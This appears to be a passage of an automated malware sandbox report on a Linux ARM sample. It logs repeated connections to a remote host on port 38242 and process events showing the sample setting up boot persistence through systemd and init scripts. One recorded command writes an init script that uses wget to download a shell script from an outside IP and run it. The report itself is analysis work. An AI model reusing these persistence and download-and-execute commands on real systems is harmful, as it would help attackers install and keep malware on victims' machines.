                                                                        Dec 24, 2024 05:34:20.227093935 CET382426010894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:20.701467991 CET382426010894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:20.701663971 CET6010838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:21.066453934 CET6011038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:21.186212063 CET382426011094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:21.186453104 CET6011038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:21.186522007 CET6011038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:21.306058884 CET382426011094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:21.691699982 CET6011038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:21.855098963 CET382426011094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:22.306489944 CET382426011094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:22.306742907 CET6011038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:22.693248987 CET6011238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:22.812974930 CET382426011294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:22.813119888 CET6011238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:22.813188076 CET6011238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:22.932786942 CET382426011294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:23.318414927 CET6011238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:23.479111910 CET382426011294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:23.942697048 CET382426011294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:23.942895889 CET6011238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:24.320070982 CET6011438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:24.439759970 CET382426011494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:24.439918041 CET6011438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:24.439999104 CET6011438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:24.559727907 CET382426011494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:24.945122004 CET6011438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:25.111087084 CET382426011494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:25.568810940 CET382426011494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:25.568996906 CET6011438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:25.946486950 CET6011638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:26.066117048 CET382426011694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:26.066245079 CET6011638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:26.066339016 CET6011638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:26.185868979 CET382426011694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:26.571259022 CET6011638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:26.731072903 CET382426011694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:27.206254959 CET382426011694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:27.206387043 CET6011638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:27.572536945 CET6011838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:27.692617893 CET382426011894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:27.692701101 CET6011838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:27.692715883 CET6011838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:27.813276052 CET382426011894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:28.198318958 CET6011838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:28.359069109 CET382426011894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:28.810100079 CET382426011894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:28.810242891 CET6011838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:29.200139046 CET6012038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:29.319957018 CET382426012094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:29.320085049 CET6012038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:29.320179939 CET6012038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:29.439713955 CET382426012094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:29.826606989 CET6012038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:29.987118006 CET382426012094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:30.443707943 CET382426012094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:30.443856001 CET6012038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:30.828396082 CET6012238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:30.947988987 CET382426012294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:30.948116064 CET6012238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:30.948199987 CET6012238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:31.067888021 CET382426012294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:31.453629017 CET6012238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:31.619168997 CET382426012294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:32.070825100 CET382426012294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:32.070987940 CET6012238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:32.455128908 CET6012438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:32.574831009 CET382426012494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:32.574995041 CET6012438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:32.575061083 CET6012438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:32.694588900 CET382426012494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:33.080578089 CET6012438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:33.243083000 CET382426012494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:33.705667019 CET382426012494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:33.705790997 CET6012438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:34.081787109 CET6012638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:34.201354980 CET382426012694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:34.201438904 CET6012638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:34.201476097 CET6012638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:34.321230888 CET382426012694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:34.706861019 CET6012638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:34.867269039 CET382426012694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:35.708812952 CET6012838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:35.828519106 CET382426012894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:35.828772068 CET6012838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:35.828957081 CET6012838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:35.948468924 CET382426012894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:36.335589886 CET6012838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:36.499140978 CET382426012894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:36.948800087 CET382426012894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:36.948911905 CET6012838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:37.337757111 CET6013038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:37.457658052 CET382426013094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:37.457827091 CET6013038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:37.457921028 CET6013038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:37.577542067 CET382426013094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:37.965176105 CET6013038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:38.127171993 CET382426013094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:38.572170973 CET382426013094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:38.572451115 CET6013038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:38.968085051 CET6013238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:39.088085890 CET382426013294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:39.088553905 CET6013238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:39.088553905 CET6013238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:39.208842993 CET382426013294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:39.599844933 CET6013238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:39.767853022 CET382426013294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:40.205471039 CET382426013294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:40.205959082 CET6013238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:40.602463007 CET6013438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:40.722780943 CET382426013494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:40.723167896 CET6013438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:40.723457098 CET6013438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:40.843281031 CET382426013494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:41.235677004 CET6013438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:41.403230906 CET382426013494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:41.847486019 CET382426013494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:41.847980022 CET6013438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:42.237945080 CET6013638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:42.357791901 CET382426013694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:42.358273983 CET6013638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:42.358517885 CET6013638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:42.478360891 CET382426013694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:42.870887995 CET6013638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:43.035507917 CET382426013694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:43.489639997 CET382426013694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:43.489854097 CET6013638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:43.872590065 CET6013838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:43.992383957 CET382426013894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:43.992844105 CET6013838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:43.993128061 CET6013838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:44.112709045 CET382426013894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:44.503247023 CET6013838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:44.667124987 CET382426013894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:45.104348898 CET382426013894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:45.104811907 CET6013838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:45.506190062 CET6014038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:45.625936985 CET382426014094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:45.626334906 CET6014038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:45.626569986 CET6014038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:45.746609926 CET382426014094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:46.137842894 CET6014038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:46.303154945 CET382426014094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:46.742690086 CET382426014094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:46.743138075 CET6014038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:47.140014887 CET6014238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:47.260210991 CET382426014294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:47.260478973 CET6014238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:47.260720968 CET6014238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:47.384582043 CET382426014294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:47.772515059 CET6014238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:47.935528994 CET382426014294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:48.377032995 CET382426014294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:48.377424955 CET6014238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:48.775595903 CET6014438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:48.898255110 CET382426014494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:48.898603916 CET6014438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:48.898603916 CET6014438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:49.018465042 CET382426014494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:49.411185980 CET6014438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:49.571357012 CET382426014494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:50.018383980 CET382426014494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:50.018807888 CET6014438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:50.413382053 CET6014638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:50.533257961 CET382426014694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:50.533521891 CET6014638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:50.533521891 CET6014638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:50.653516054 CET382426014694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:51.045670986 CET6014638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:51.207412958 CET382426014694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:51.654774904 CET382426014694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:51.655332088 CET6014638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:52.048974037 CET6014838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:52.169106960 CET382426014894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:52.169599056 CET6014838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:52.169713974 CET6014838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:52.289720058 CET382426014894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:52.683876991 CET6014838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:52.847529888 CET382426014894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:53.285893917 CET382426014894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:53.286411047 CET6014838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:53.688077927 CET6015038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:53.808473110 CET382426015094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:53.808880091 CET6015038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:53.808999062 CET6015038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:53.929284096 CET382426015094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:54.322324038 CET6015038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:54.483527899 CET382426015094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:54.952227116 CET382426015094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:54.952689886 CET6015038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:55.325035095 CET6015238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:55.445226908 CET382426015294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:55.445390940 CET6015238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:55.445487976 CET6015238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:55.565227032 CET382426015294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:55.958172083 CET6015238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:56.098181009 CET382426012694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:56.098584890 CET6012638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:56.119266987 CET382426015294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:56.576553106 CET382426015294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:56.576841116 CET6015238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:56.960772038 CET6015438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:57.081161022 CET382426015494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:57.081378937 CET6015438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:57.081378937 CET6015438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:57.201350927 CET382426015494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:57.591630936 CET6015438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:57.759047031 CET382426015494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:58.199289083 CET382426015494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:58.199549913 CET6015438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:58.593234062 CET6015638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:58.713103056 CET382426015694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:58.713340998 CET6015638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:58.713418007 CET6015638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:58.833112955 CET382426015694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:59.219247103 CET6015638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:59.379189968 CET382426015694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:59.850435972 CET382426015694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:59.850786924 CET6015638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:00.220894098 CET6015838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:00.340689898 CET382426015894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:35:00.340982914 CET6015838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:00.341204882 CET6015838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:00.460830927 CET382426015894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:35:00.846942902 CET6015838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:01.007266045 CET382426015894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:35:01.459165096 CET382426015894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:35:01.459254980 CET6015838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:01.848664045 CET6016038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:01.968417883 CET382426016094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:35:01.968538046 CET6016038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:01.968616009 CET6016038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:02.088421106 CET382426016094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:35:02.476603985 CET6016038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:02.639240980 CET382426016094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:35:03.087445021 CET382426016094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:35:03.087759018 CET6016038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:03.478374958 CET6016238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:35:03.598973036 CET382426016294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:35:03.599075079 CET6016238242192.168.2.2394.156.227.234

                                                                        System Behavior

                                                                        Start time (UTC):04:32:50
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/bin/dash
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:50
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/bin/rm
                                                                        Arguments:rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8q
                                                                        File size:72056 bytes
                                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                        Start time (UTC):04:32:50
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/bin/dash
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:50
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/bin/rm
                                                                        Arguments:rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8q
                                                                        File size:72056 bytes
                                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/tmp/arm.nn.elf
                                                                        Arguments:/tmp/arm.nn.elf
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/tmp/arm.nn.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/bin/systemctl
                                                                        Arguments:systemctl enable custom.service
                                                                        File size:996584 bytes
                                                                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/tmp/arm.nn.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/bin/chmod
                                                                        Arguments:chmod +x /etc/init.d/system
                                                                        File size:63864 bytes
                                                                        MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/tmp/arm.nn.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/bin/ln
                                                                        Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                                                        File size:76160 bytes
                                                                        MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/tmp/arm.nn.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):04:32:56
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/tmp/arm.nn.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/bin/chmod
                                                                        Arguments:chmod +x /etc/init.d/arm.nn.elf
                                                                        File size:63864 bytes
                                                                        MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/tmp/arm.nn.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/usr/bin/mkdir
                                                                        Arguments:mkdir -p /etc/rc.d
                                                                        File size:88408 bytes
                                                                        MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
                                                                        Path:/tmp/arm.nn.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):04:32:57
                                                                        Start date (UTC):24/12/2024
